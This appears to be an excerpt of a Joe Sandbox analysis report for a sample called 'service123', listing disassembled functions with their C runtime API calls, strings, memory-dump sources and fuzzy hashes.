Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: abb7b77d48ade1e2782575f506ec332ace91afc27d6708f95059d851ecdeec50
Instruction ID: 7f7566a47bad0f011b5d49589e23eb640fdd4bae8a0ba5d2dd6475771bb2dc92
Opcode Fuzzy Hash: abb7b77d48ade1e2782575f506ec332ace91afc27d6708f95059d851ecdeec50
Instruction Fuzzy Hash: 77A16B70A086058FCB00EF69C18075EBBF1BF45348F10896DD8989BB59DB35E849CFA2

Function 6C333B80 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C333C1F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2CE77E), ref: 6C333C83
memmove.MSVCRT ref: 6C333CBB
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2CE77E), ref: 6C333D2A

Strings

basic_string::_M_replace, xrefs: 6C333EAF

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 96adec9904a533eb68732d0dc18200761ad4932656f85f7a4a60a6ed718f0fc0
Instruction ID: 4b43847414a685db7037d6c8f51d290c1b38bf51af65fece54e27fbb3eb3a836
Opcode Fuzzy Hash: 96adec9904a533eb68732d0dc18200761ad4932656f85f7a4a60a6ed718f0fc0
Instruction Fuzzy Hash: F29137356493A5CFC740EF18C08095ABBE1BFC9748F50992EE8899B720D775E946CF82

Function 6C29E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 43edacbd6547742b06bcdab6a13642cc411f44411e002285349532e52864adc9
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 1621CC3195420EDFD710CE5BC48199BB7A9BF86315B548915EC8847E68D730E88BC7D2

Function 008F1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 008F1EAF
signal.MSVCRT ref: 008F1EF6
signal.MSVCRT ref: 008F1F0F
signal.MSVCRT ref: 008F1F36
signal.MSVCRT ref: 008F1F72
signal.MSVCRT ref: 008F1FBF
signal.MSVCRT ref: 008F1FD5
signal.MSVCRT ref: 008F1FEB

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: ae88b23dfc003f576354d3140a366a134ecf786e05530552ebbbbb3680487b28
Instruction ID: 12d86dfaa4b8896f2e15c4dc7e023343b9b9226b5ecca5278817d83d59605666
Opcode Fuzzy Hash: ae88b23dfc003f576354d3140a366a134ecf786e05530552ebbbbb3680487b28
Instruction Fuzzy Hash: 6331DA70608209DAEB206F78895873E76D4FB85358F65491DEAC4C6281CF7EC8889B53

Function 008F4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 008F4378

Strings

Inf, xrefs: 008F4E35, 008F4E4D
NaN, xrefs: 008F4D3B
@, xrefs: 008F4647

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 20b737cdbc18162fa4c6055142b220bbf4e7d9dfb26e967d5653183fafb5a461
Instruction ID: 26a710edfafb145688888623ee8344647c2de8700ce8789102212c1910f79000
Opcode Fuzzy Hash: 20b737cdbc18162fa4c6055142b220bbf4e7d9dfb26e967d5653183fafb5a461
Instruction Fuzzy Hash: 40F18D716083998BD7309E34C0503BBBBE2FB85314F149A1EEAD9D7381D7359906CB46

Function 6C2A4A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C2A4A48

Strings

@, xrefs: 6C2A4D17
Inf, xrefs: 6C2A5505, 6C2A551D
NaN, xrefs: 6C2A540B

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: d1e7efe423086edfa4aa43c9089ee9926c10239ae1773d81187553c74758be0d
Instruction ID: 08cea504eb096a2a1efb8f7f969bd97310f14dd6130ca59536a7f8d6c1ca4850
Opcode Fuzzy Hash: d1e7efe423086edfa4aa43c9089ee9926c10239ae1773d81187553c74758be0d
Instruction Fuzzy Hash: 94F1A17160C78A8BD7218E64C45079BBBE2BBC5319F148A2DEDDC47781DB35D90B8B42

Function 008F3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 008F342A
0, xrefs: 008F34C6

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 6ac5a9aefa89004ace29bee8886083eca59a4885afa5f2cdbf7e3fbca417bad4
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 92C15A71A002198BCB15CF6CD4847ADBBF1FF98314F298259EA58EB389D734E941CB90

Function 6C2A3830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C2A3AFA
0, xrefs: 6C2A3B96

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 9d058953a664f8eca488e237c0cb27ba74406f6830af68e0e10cdbff379f0b39
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: F8C15B71E1421A8BDB04CFA9C48478DFBF2BF89314F258659EC54AB796D334E846CB90

Function 6C2BB5C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BB5E6
memcmp.MSVCRT ref: 6C2BB60A
memcmp.MSVCRT ref: 6C2BB67D
memcmp.MSVCRT ref: 6C2BB6EF

Part of subcall function 6C35AB60: strlen.MSVCRT ref: 6C35AB6E

memcmp.MSVCRT ref: 6C2BB787

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2BB631, 6C2BB6A2, 6C2BB715, 6C2BB7AE, 6C2BB7CA
basic_string::compare, xrefs: 6C2BB629, 6C2BB69A, 6C2BB70D, 6C2BB7A6, 6C2BB7C2

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 1af50e83de43ff40a2cc5304cb560df4ccd1294d236c2d2a6043c61822805c39
Instruction ID: d56b0cae4bd75a8669a32794a712f513848c32699a0ffea44b3e20e69621999f
Opcode Fuzzy Hash: 1af50e83de43ff40a2cc5304cb560df4ccd1294d236c2d2a6043c61822805c39
Instruction Fuzzy Hash: 6861587560A3159FC300AF29C9C095ABBE5BB88688F55892DE9C897711D332DC40CBA6

Function 6C2B74C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3030D0: memset.MSVCRT ref: 6C303115

strcmp.MSVCRT ref: 6C2B7521
strlen.MSVCRT ref: 6C2B753C
strlen.MSVCRT ref: 6C2B7583
strlen.MSVCRT ref: 6C2B75F4
strlen.MSVCRT ref: 6C2B7662

Strings

*, xrefs: 6C2B7740

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: 7bbe4ff1ed2c8ac50daa6403d36649a0373d1fa8ae387159b5844a80e3123e4d
Instruction ID: f3f9b602a3510ec520ff6810c144ff7cdd4a6c60375941961249d6d799fbadf5
Opcode Fuzzy Hash: 7bbe4ff1ed2c8ac50daa6403d36649a0373d1fa8ae387159b5844a80e3123e4d
Instruction Fuzzy Hash: 718145B5A056018FDB00EF29C488A9AFBF5FF89708F01856DD994AB710D731E809CB92

Function 6C29E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 8ce9e3d2b30f0ee40ccb0828514c313c1bfc5ef62bd7559ff27b18ed88d9b7ee
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: AD51887050970ACFD710DF1AC08065AF7E0BF8A309F448A5EFC989BA55E730D94ACB96

Function 6C29E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C29E487
WaitForSingleObject.KERNEL32 ref: 6C29E4C8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: df0438099ff6838e4006de0fd181392c5ca754313c1424e743e3fdcbe6ccf2b6
Instruction ID: 2812735aa1a422b7b7b78919a4dc335979d8f7af08950391a7c7f0eddf5fba14
Opcode Fuzzy Hash: df0438099ff6838e4006de0fd181392c5ca754313c1424e743e3fdcbe6ccf2b6
Instruction Fuzzy Hash: DA515970709306DBDB10DF2BC58476A7BF8FB16309F244929EC588BB80D770D4498BA6

Function 6C2A01F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2A0209
memcpy.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C2A022D
malloc.MSVCRT ref: 6C2A0247
memset.MSVCRT ref: 6C2A0275
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 5b1fd83a663c39a1f8d82dcd5c26dc729ca5365229f15c738175ce8f9be902f0
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 02118FB16053099FD700BFAAD484999BBE8EB44398F01893EDC49C7B01E732D5198B61

Function 008F8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 008F812C
GetProcAddress.KERNEL32 ref: 008F814C
GetProcAddress.KERNEL32 ref: 008F818B

Strings

___lc_codepage_func, xrefs: 008F8144
__lc_codepage, xrefs: 008F8180
msvcrt.dll, xrefs: 008F8125

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 447eb451f912c0700188d647f30b3c8e606fffa3a02c9ce9d814e84a77039c90
Instruction ID: d6f6beb1d5e9e06562f0a72208f212a5e1ed861e307bade87423a11bea8fc935
Opcode Fuzzy Hash: 447eb451f912c0700188d647f30b3c8e606fffa3a02c9ce9d814e84a77039c90
Instruction Fuzzy Hash: CBF049B0904218CB9B007BB96D4467B7AE0FA04320F45863ACAC9C7210EB748499CBA3

Function 6C2A9171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2A917C
GetProcAddress.KERNEL32 ref: 6C2A919C
GetProcAddress.KERNEL32 ref: 6C2A91DB

Strings

___lc_codepage_func, xrefs: 6C2A9194
__lc_codepage, xrefs: 6C2A91D0
msvcrt.dll, xrefs: 6C2A9175

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 4666979d7ba603d6e2df8d3aa06f27e00400305d3acf1196fb992ae4e82d5fc2
Instruction ID: c236c5ef4b924d3a61d28a97613d87daa7a3984928cd7e38392445211759f81c
Opcode Fuzzy Hash: 4666979d7ba603d6e2df8d3aa06f27e00400305d3acf1196fb992ae4e82d5fc2
Instruction Fuzzy Hash: C0F096B5A453098BEB00BFBD990A25A7BF4A606311F51057DDD89CB600E235D421CFB7

Function 6C29EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 9585ae3b8a24d032c42e2026ee73d7ae1afaa0056ffae71bd7459411ac15425d
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 61B01231DD922D8B442075BF4510180B22DB6173C97046843CC4AA3D098332E05B48A6

Function 6C334890 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C33B65E), ref: 6C334913
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C33B65E), ref: 6C334955

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 95d6175264cdaedf041e895068989a5c6de52a71ea2aa3700167a86916e5c720
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 956104B4A09755CFC714DF29C19051AFBE0EF88754F20892EE8A98B761E732E845CF52

Function 6C330720 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2C9053,00000003), ref: 6C33079D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2C9053,00000003), ref: 6C3307DC

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: af5406bda36833d8e1d538c2d9c8c82419bac052f1a6af33e16762cd9f500783
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: A861F2B4609796CFC704DF19C19061AFBE0AF98754F20C91EE8AA8B761D731E845CF92

